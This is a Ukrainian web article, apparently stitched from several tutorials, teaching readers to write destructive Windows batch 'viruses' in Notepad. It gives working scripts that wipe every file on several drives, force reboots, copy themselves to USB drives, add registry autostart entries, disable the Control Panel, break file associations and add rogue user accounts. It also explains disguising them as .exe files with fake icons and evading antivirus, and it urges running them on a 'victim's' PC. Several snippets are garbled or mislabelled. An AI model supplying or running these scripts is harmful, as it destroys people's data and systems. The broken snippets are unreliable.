Контакти

Створення вірусів. Приклади шкідливих файлів Ворога треба знати в обличчя. Як створити, написати комп'ютерний вірус? Коди для створення вірусів у блокноті

Віруси пишуть, як правило, для того, щоб зіпсувати життя іншому - "з'їсти" вільне місце на його ПК, вивести з ладу систему, "зламати" паролі тощо. Незважаючи на такі наслідки, існують віруси, створені, щоб просто посміятися над другом. Пишеться такий вірус за п'ять хвилин, і він не витворює із системою нічого критичного. Найбільш поширеними вірусами-жартами є вимикання ПК, багаторазове відкриття однієї і тієї ж програми, виведення смішного тексту.

Подібні прості віруси створюються в стандартному Блокноті (Notepad), хіба що зберігаються не з роздільною здатністю.txt, а у форматі командного файлу.bat.

Як зробити вірус

Розглянемо поетапно, як написати вірус, який багато разів відкриває один додаток.

  1. Відкриваємо блокнот - для цього на робочому столі клацаємо правою кнопкою миші та вибираємо "Створити" → "Текстовий документ".
  2. Починаємо наповнювати наш вірус командами
    • @echo off //у даному рядку забороняємо виведення команд
    • echo "процес запущено" //текст, який побачить користувач
    • start mspaint
    • goto: p // багаторазовий запуск програми paint
    • pause //натискання будь-якої клавіші
    • del % 0 // Самознищення вірусу
  3. У збереженого файлу змінюємо значок на популярніший (браузер, word тощо) і прописуємо відповідне ім'я.

Ще кілька можливих розіграшів:

Якась подібність заставки фільму "матриця"

  • @echo off
  • color 2
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • goto:a
  • pause

Зміна роботи кнопок миші

  • %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Зміна часу

  • time 0:00

Вимкнення клавіатури

  • rundll32 keyboard,disable

Вимкнення миші

  • rundll32 mouse,disable

Ми розглянули найпростіші і нешкідливі способи, як нашкодити приятелю. Насправді, вивчивши системні команди, можна безповоротно "покласти" систему на чужому комп'ютері (та й на своєму необережно).

Про існування різних видів вірусів ви можете також дізнатися зі статті, але заглиблюватися в цю тему не варто, щоб не створювати собі та інших зайвих проблем. Краще подбати про захист власного комп'ютера та поставити надійну антивірусну програму, щоб самому не потрапити на розіграш друга чи ворога.

Знайдіть операційну систему, яку бажаєте атакувати.Найчастіше - це Microsoft Windows, особливо старі версії. Багато користувачів не оновлюють їх операційні системи, залишаючи їх вразливими до сучасних атак.

  • Mac OS X та Linux вважаються більш захищеними від вірусних атак (пов'язано з роботою прав доступу та архітектурою операційної системи). 95% всіх вірусів орієнтовані на користувачів Windows.

Вирішіть, як розповсюджувати вірус.Вірус буде вірусом, якщо зможе поширитись на інших користувачів. Вам необхідно придумати метод доставки, перш ніж почнете роботу над створенням вірусу. Часті компоненти доставки:

Знайдіть слабке місце для атаки.Успішні віруси використовують слабкі місця в програмах та системній безпеці, щоб працювати та поширюватися. На це йде багато досліджень і знань, але є спеціалізовані спільноти, які можуть з цим допомогти.

Визначтеся з функціоналом вашого вірусу.Що зробить вірус після зараження? Ефекти можуть бути різними, починаючи від нульового ефекту, відображення повідомлення, видалення файлів та інші більш шкідливі ефекти. Знайте, що створення та розповсюдження вірусів є незаконною дією в багатьох країнах.

Виберіть мову.Щоб створити вірус, вам потрібне хоча б базове розуміння якоїсь мови програмування або скриптового інструменту. Більш складні віруси часто включають кілька мов програмування. Для найбільш ефективних вірусів вам знадобиться знання асемблера.

  • Якщо ви хочете створити віруси, що виконують, то пошукайте курси C і C++ в інтернеті.
  • Якщо ви хочете створити макро віруси, вивчіть мову макросів для потрібної програми, наприклад, Microsoft Office.
  • Visual Basic можна використовувати для створення шкідливих програм для користувачів Windows.
  • Почніть роботу над вашим вірусом.На це піде тривалий час, особливо вперше. Експериментуйте якомога більше, і дізнайтеся про способи поширення вашого коду в залежності від мови, що використовується. Існують посібники та блоги з вивчення деяких мов.

    • Дізнайтеся про поліморфний код. Це змінить код програми після кожної репліки, приховуючи вірус від антивірусних програм. Поліморфний код буде досить просунутим кроком, який створюється різними способами у різних мовах програмування.
  • Дізнайтеся про способи заховати ваш код.Крім поліморфного коду, існують способи заховати ваш вірус. Шифрування є популярним інструментом серед розробників вірусів. На це йде багато часу та читання, але в результаті ви зможете захистити та продовжити життя вашому вірусу.

  • Перевірте ваш вірус.Як тільки створіть працюючий прототип, перевірте його на кількох машинах та складаннях. Найпростіший спосіб – це використання віртуальних машин із різними збірками.

    • Постарайтеся проводити тести в закритій збірці так, щоб уникнути випадкового потрапляння вашого вірусу до мережі. Поставте тестові машини в окрему мережу та протестуйте поширення вірусу.
    • Поліпшуйте код вашого вірусу під час тестування. Працюйте над помилками коду.
  • BATCH & EXECUTE
    BUGS

    Зараз віруси множаться в десятки тисяч разів, як ми припускаємо. Вони з'явилися ще у 80-х роках. На той час світ дізнався, що таке віруси і що вони робить, коли потрапляють у ПК. Сьогодні я «SMOKED» розповім вам, як створити свій вірус у блокноті, і хочу сказати, що це тільки командний файл, який тільки даватиме накази системі та мікропроцесору.
    Самий смак у цій роботі, те що користувач не буде знати, що його прога насправді бомба для Windows-а.
    Отже, почнемо. Ви вирішили зайнятися вірусом. Відразу вам скажу, що ці віруси, звичайно, можуть дуже нашкодити комп'ютеру, але повноцінно передаватися з одного комп'ютера на інший вони не можуть. За все, що станеться, з комп'ютером відповідаєте ви і тільки ви. Тут нам знадобиться лише блокнот.
    Приступимо:

    1) Відкриваємо блокнот;
    2) Пишемо у ньому «mspaint», без лапок;
    3) Зберігаємо файл під будь-яким ім'ям, але замість .txt ми напишемо .bat;
    4) Відкриваємо файл, і побачимо, що відкрився Paint 
    Ось і готова наша перша програма. Замість «mspaint» можна вписати будь-яку програму, наприклад: Calc-калькулятор, Taskmgr-диспетчер завдань… Але до чого тут віруси? - Запитайте ви. Ні при чому!  Наступне, що ми зробимо, це програма для зміни часу на комп'ютері, та й ще вона буде копіювати себе на флешку (якщо та вставлена).
    Отже, пишемо у блокноті:

    time 00:00
    copy %0 F:\Work.bat

    Першим рядком ми змінюємо час на 00:00, а другий скопіюємо файл на диск (F, G, J, K, H) - флешка з ім'ям Work. Не забудьте зберегти блокнотівський файл у форматі.bat. Замість часу можна змінити і дату "Date 13.06.23". Написавши такий рядок, ми змінимо дату на 2023 рік, 6 місяць, 13 число.   Тепер невеликий перелік того, що можна писати у блокнотівському вірусі.

    ПЕРЕЛІК:

    1) "copy %0 x:\y" - копіює вірус на диск x у папку y (приклад copy %0 C:\System.bat);
    2) "label x: y" - перейменовує диск x на ім'я y (приклад label C: error);
    3) "time х:у" - змінює час на х годин і у хвилин (приклад time 14:27);
    4) "date x.y.z" - змінює дату на x день, y місяць, z років (приклад date 16.11.05);
    5) «md х» - створить папку, там, де наш вірус, з ім'ям х (приклад md Papka);
    6) «del *.* /q» - видалити всі файли (наш вірус теж) у папці, де лежить наш вірус (крім папок);
    7) "del x:\y *.* /q" - видалити всі файли на диску х в папці у (крім папок) (приклад del F:\Data*.* /q);
    8) «assoc .х=.у» - переробить всі файли, на комп'ютері, форматом х на (приклад assoc .exe=.mp3);
    9) "net user "х" / add" - додасть на комп'ютер користувача під ім'ям х (приклад net user "Smoked" / add);

    Ось дві програми вам на розгляд, можете їх використовувати без моєї угоди, але, використовуючи їх, ви приймаєте угоду користувача.

    1) Програма для видалення файлів з флешки (якщо та вставлена) та перейменування її.
    del F:\ *.* /q
    label F:HACK

    2) Програма для зміни дати та часу на комп'ютері та копіювання її на диск C та на флешку.
    time 14:13
    date 11.07.12
    copy %0 C:Time.bat
    copy %0 F:\Time.bat
    Ви вже вмієте створювати прості віруси. Він вміє: змінювати час, дату, назви дисків та флешок, відкривати програми, створювати папки, копіювати себе, додавати користувачів, змінювати розширення та знищувати інформацію. Це досить невеликий список, чесно кажучи. Тепер я навчу вас деяким тонкощам вірусопису. Допустимо, ви вже зробили вірус, але виглядає він досить негарно. Ну хто відкриє незрозумілий файл? Ви маєте рацію, таких людей у ​​світі не багато. Як змінити формат з.bat на.exe і додати іконку. Дуже легко (Потрібно, щоб на комп'ютері був WinRAR). Знаходимо будь-який вірус з розширенням.bat, натискаємо на нього правою кнопкою, тиснемо "Додати в архів ...". Ставимо галочку «Створити SFX-архів», вибираємо вкладку додатково, і натискаємо кнопку «Параметри SFX…». У вікні "Виконати після розпакування" пишемо назви вірусу (приклад Virus.bat), а у вікні "Текст і графіка" далі "Завантажити значок SFX з фала". Тиснемо «Огляд» та шукаємо будь-який значок формату.ico. Тепер тиснемо ОК. Готово  Формат.exe, а не .bat, як нам і треба було. Тепер можна робити з вірусами будь-що. А що саме вирішувати вже вам.
    Припустимо, ви написали вірус, який псуватиме відкриту від папок інформацію і трохи шкодитиме:

    del C:\ *.* /q
    del D:\ *.* /q
    del E:\ *.* /q
    del F:\ *.* /q
    time 00:00
    date 13.06.23
    del *.* /q

    Чи готовий наш вірус? – Запитайте себе. Звичайно, ні. Потрібно його негайно закінчити. У цьому я вам із задоволенням поможу. І так наша нова команда @echo off вводитися на початку нашого вірусу і приховує все, що в ньому відбувається надалі. Одним словом, не дамо користувачеві побачити, що сталося. Ще додавши після кожної команди простеньке, але дуже ефективне дію, як «nul» наприклад «time 00:00 >nul», ми приховаємо сточку. Отже, можна вдосконалити наш вірус:

    @echo off
    del C:\ *.* /q >nul
    del D:\ *.* /q >nul
    del E:\ *.* /q >nul
    del F:\ *.* /q >nul
    time 00:00 >nul
    date 13.06.23 > nul
    del *.* /q >nul

    Ось тепер наш вірус готовий. Ви можете перевірити його. Але не раджу вам перевіряти його на вашому ПК  . Зберігаємо, конвертуємо, а ось, що далі з ним робити – ваша справа. До речі, є чудова програма для конвертування.bat в.exe, вона працює набагато краще WinRAR, називається вона «Bat to exe converter». Завантажити її можна в інтернеті, вона безкоштовна. Отже, повернемося до вірусо-письменництва.
    %SystemRoot%/system32/rundll32 user32, SwapMouseButton Цей рядок змінює клавіші миші місцями. Можна з когось прикольнутися, поки він в'їде, що трапилося, мине час (якщо він зовсім користувач), для особливо обдарованих скажу, якщо ви ввели це в себе відключити досить просто: «Панель Управління», «Принтери та інше обладнання», « Миша» і знімаємо першу галочку.
    Отже, далі поїхали далі:

    :x;
    Start mspaint
    goto x;

    Дуже хороший рядок для навантаження слабких машин. Команда відкриває Paint, до того ж дуже швидко. Раз 60 до того, як ви зрозумієте, що трапилося і закриєте програму. Спробуйте ввести замість mspaint будь-які рядки програм... Працює  Можна використовувати кілька таких команд до повного гальмування комп'ютера нашої жертви.

    Пишемо новий скрипт:

    copy ""%0"" "%SystemRoot%\system32\File.bat"
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

    Дуже жорстока команда додає програму в автозавантаження ОС. Не раджу перевіряти на вашому комп'ютері. Не зупиняємось і їдемо далі. 

    assoc .lnk=.txt >nul
    assoc .exe=.mp3 >nul

    Цими двома рядками ми робимо дуже важку шкоду комп'ютеру жертви. Він змінює розширення всіх файлів на комп'ютері с.lnk в.txt і.exe в.mp3. Тобто всі ярлики відкриваються в блокноті, а програми все в плеєрі. Круто так? Тепер прочитайте нижній код і якщо ви зрозуміли, в чому суть вірусу, вітаю вас, ви закінчили базовий курс, від SMOKED вірусопису. Якщо ж ні. Читаємо все заново  

    @echo off
    %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
    time 0:00 >nul
    date 13.06.23 > nul
    label C:IDIOT >nul
    label D:URAK >nul
    label E:SUKA >nul
    label F:GANDON >nul
    copy %0 C:\Open.bat >nul
    copy %0 D:\Open.bat >nul
    copy %0 E:\Open.bat >nul
    copy %0 F:\Open.bat >nul
    net user "Idiot you Hacked" /add >nul
    net user "Bitch you Hacked" /add >nul
    net user "Durak you Hacked" /add >nul
    net user "Kritin you Hacked" /add >nul
    net user "Gavno you Hacked" /add >nul
    md 1 >nul
    md 2 >nul
    md 3 >nul
    md 4 >nul
    md 5 >nul
    md 6 >nul
    md 7 >nul
    md 8 >nul
    md 9 >nul
    md 10 >nul
    md 11 >nul
    md 12 >nul
    md 13 >nul
    md 14 >nul
    md 15 >nul
    md 16 >nul
    md 17 >nul
    md 18 >nul
    md 19 >nul
    md 20 >nul
    md 21 >nul
    md 22 >nul
    md 23 >nul
    md 24 >nul
    md 25 >nul
    md 26 >nul
    md 27 >nul
    assoc .lnk=.txt >nul
    assoc .exe=.txt >nul
    :x;
    Start mspaint
    goto x;
    :x;
    Start Calc
    goto x;
    copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
    del %0 >nul

    На цьому мої уроки закінчено. Сподіваюсь вам сподобалось! З повагою SMOKED! P.S. Коли я вперше виклав цю статтю в інтернет. На мій ICQ надійшло близько 70 повідомлень із проханням зламати поштову скриньку . Писав усе сам, стаття моя! 

    Для того, щоб зрозуміти наскільки Ваш комп'ютер не захищенийвід дій зловмисників пропоную створити кілька простеньких вірусів самому. Завдяки цьому Ви зрозумієте, що будь-який комп'ютер підпорядковується не лише натисканням клавіш. Комп'ютер отримавши лише одну команду (натискання на іконку файлу, можна і без нього), може почати самостійно відкривати, створювати, видаляти, перейменовувати і т.д.
    Як правило, розширення цих файлів.bat .exe - перед точкою будь-яке придумане ім'я.

    - Файл.batстворюється у звичайному блокноті, при збереженні використовується розширення.bat, замість.txt (за замовчуванням Безіменний.txt або *.txt).
    Приклад: відкриваємо стандартний блокнот пишемо mspaint - всього 7 букв, зберігаємо цей файл (файл - зберегти як) не як завжди, а пишемо замість "Безім'яний.txt" - myfile.bat. Природно, замість myfile будь-яка зручна назва.

    Якщо Ви виконали вищезгадані дії, то вітаю: вами створено перший командний файл, який, натиснувши на нього, відкриє рисувальник Paint (є в будь-якій Windows).

    - Файл.exeкомпілюється спеціальною програмою з bat файлу (не лише з нього) для маскування чи іншої функціональності.
    Подібних програм компіляторів існує багато, одну з них можете завантажити в комплекті з набором заготовок для експериментів з bat файлами.
    Скріншот програми Bat Exe Converter:


    Але командні файли можуть бути не такі нешкідливі, як описаний вище. Достатньо змінити його вміст, як ваш комп'ютер почне виконувати будь-які прописані в ньому команди.

    Наведу приклади результатів команд, які можна назвати просто жартами над товаришем:
    - змінити дату на комп'ютері, припустимо 1812 рік або день Вашого народження;
    - Постійно багато разів поспіль відкривати Paint, Калькулятор, Помилки...;
    - поміняти кнопки миші місцями;
    - вимкнути комп'ютер;
    - змусити комп'ютер постійно перезавантажуватися;
    - перейменувати ім'я жорсткого диска;
    - Видалити всі файли з папки в якій лежить даний файл (не дай Боже, якщо це робочий стіл);
    І так далі практично можна придумати будь-які жарти. Це залежить від витонченості мислення месника.

    Нижче наведені жорстокі дії, на які здатний цей файл, тут вже не до жартів:
    - можливість самостійно записуватися в будь-яке місце, включаючи флешку;
    - мати прихований атрибут, бути не видимим, як і виконання його команд;
    - Перейменувати всі файли на комп'ютері, припустімо.lnk переробити в.txt, а необхідні в роботі.exe назвати.mp3. Результат: ярлики будуть відкриватися в блокноті, робочі програми намагатимуться відкритися в плеєрі.
    - множину разів приховано відкривати ту саму програму, для гальмування комп'ютера;
    - додавати вірус до автозавантаження, при включенні комп'ютера;
    - Повне видалення без можливості відновлення будь-якої програми. Зазвичай програми встановлені за умовчанням у певній директорії та хакеру це відомо.
    На цьому перелік тільки починається. Але ми зупинимося, адже цього вже достатньо для того, щоб комп'ютер перестав працювати.

    Для того щоб описане вище не було голослівним, нижче Ви можете завантажити архів.
    У ньому лежить:
    - текстовий файл "Самовчитель.txt" з описом кодів bat і наведених живих прикладів.
    - Програма для компіляції файлів в.
    - Зміна кнопок миші для прикладу
    - Безневинні корисні готові файли bat:
    otkl-60.bat – відключення комп'ютера через 60 секунд
    otkl-60-otmena.bat - скасування відключення
    Paint.bat - включаємо Paint
    Simvol.bat – відкриваємо таблицю символів

    Завантажити створення вірусів для захисту від них- Ворога треба знати в обличчя:

    При завантаженні антивірус вашого комп'ютера може почати лаятись і правильно зробить.
    Будьте обережні! Після завантаження архіву та його розпакування не натискайте на файли без вивчення інструкції або цієї статті.

    Перевірити вміст файла.bat можна натисканням на нього правою клавішею миші та вибором зі спливаючого меню пункту "Змінити":


    Перед експериментами переконливо прошу створити резервну точку відновлення системи.

    Сподіваюся ці експерименти переконають Вас у тому, що потрібно уважніше ставитись до чужорідних файлів та програм, які відкриваються та встановлюються нами на комп'ютер. Будьте уважні при роботі з поштою: не завантажуйте і тим більше не відкривайте файли, подібні до наших прикладів.

    Закінчую на мінорній ноті: Обережно! Віруси усюди!

    ДИСКЛЕЙМЕР

    Ця стаття написана в освітніх цілях і автор не несе відповідальності за вчинені вами дії. Будьте розважливими і цінуйте праці інших людей.

    Як створюються комп'ютерні віруси Трохи теорії

    Комп'ютерні віруси– вид шкідливого програмного забезпечення, здатного створювати копії самого себе та впроваджуватись у код інших програм, системні області пам'яті, завантажувальні сектори, а також розповсюджувати свої копії різноманітними каналами зв'язку.

    Комп'ютерні віруси мають такі класифікації:

    • Завантажувальні віруси– віруси, які проникають у завантажувальний сектор пристроїв зберігання даних, таких як жорсткі диски, флешки, дискети тощо, та здатні порушити доступність файлів.
    • Файлові віруси– тип вірусів, які впроваджуються у файли (файли з розширенням COM і EXE) і негативно впливають на їх функціональність.
    • Файлово-завантажувальні віруси– віруси, що поєднують у собі функції двох попередніх типів вірусів;
    • Документні віруси- Вид вірусів, які заражають файли офісних систем. Такий вид ще називають "макровірусами", оскільки зараження системи відбувається за допомогою зараження макросів програми.
    • Мережеві віруси– тип вірусів, які поширюються з допомогою використання комп'ютерної мережі, тобто. мережевих служб та протоколів.

    Найвідоміший вірус у світі називався ILOVEYOU. За своєю суттю він був абсолютно нешкідливим, хробаком, який спамив пошти людей. Однак нещодавно світ був схильний до кібератаків, які змусили всіх задуматися про свою безпеку. Вірус WannaCry заразив дуже багато комп'ютерів і вимагав викуп у розмірі 300 доларів у біткоїнах. Однак деякі аналітики вважають, що це була лише перевірка і далі буде ще одна атака, набагато більших масштабів і спрямована на користувачів Apple.

    І все ж, WannaCry хоч і був поширений і досить багато з нього грошей отримали, це був звичайний WinLocker, який можна було зняти. Справа в тому, що платили в більшості банки та компанії, які не мали часу розбиратися, а 300 доларів для них не є серйозною втратою.

    Створюємо жартівливі віруси і не лише

    Давайте створимо кілька своїх вірусів, які я не рекомендую перевіряти на своєму комп'ютері, оскільки це може погано закінчитися.

    Зробити такі віруси зможе абсолютно кожен, тому що нам не знадобляться спеціалізоване програмне забезпечення тощо, нам потрібен просто блокнот.

    Відразу скажу, що збережуть наш файл практично у всіх випадках ми будемо у форматі.bat, ім'я я пишу anyname, але ви можете давати абсолютно будь-яке.

    Видалення всіх файлів

    Даний код ми зберігаємо як anyname.bat і все, після запуску весь вміст буде видалено.

    Синій екран Смерті

    @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00

    Даний код ми зберігаємо у файл anyname.vbs, зверніть увагу, що формат файлу обов'язково повинен бути.vbs, а не.bat.

    Форматуємо диски C, D, E за три секунди

    rd/s/q D:
    rd/s/q C:
    rd/s/q E:

    Зберігаємо цей файл як anyname.bat і запускаємо. Форматування всіх дисків відбудеться за три секунди.

    Ефект Матриці Matrix Effect

    @echo off
    color 02:tricks
    echo %random%%random%%random%%random%%random%%random%%random%%random%
    goto tricks

    Зберігаємо як anyname.bat і запускаємо, це не є небезпечним для вашого ПК.

    Вимкнення ПК та відключення можливості перезавантаження

    @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini attrib -r -s -h c:windowswin.ini del c:windowswn.ini @echo off Msg *YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c:Drive

    Зберігаємо як kind.bat, НЕБЕЗПЕЧНО ЗАПУСКАТИ НА СВОЄМ ПК!

    Замінюємо файли на неробочі

    Цей вірус замінить наступні формати (.exe .jpeg .png .mpeg .sys)

    @echo off assoc .txt=jpegfile

    Зберігаємо як anyname.bat та запускаємо.

    Видалення операційної системи

    @echo off Del C:*.* |y

    Зберігаємо як anyname.bat та запускаємо на ПК жертви.

    А на цьому сьогодні все, дякую за прочитання статті і я сподіваюся ви не будете зловживати отриманою інформацією. Якщо ви хочете ще вірусів, то пишіть у коментарях, зробимо! Збережіть статтю у своїх соціальних мережах, щоб не втратити.

    Успіхів у житті і до зустрічі!



    Сподобалася стаття? Поділіться їй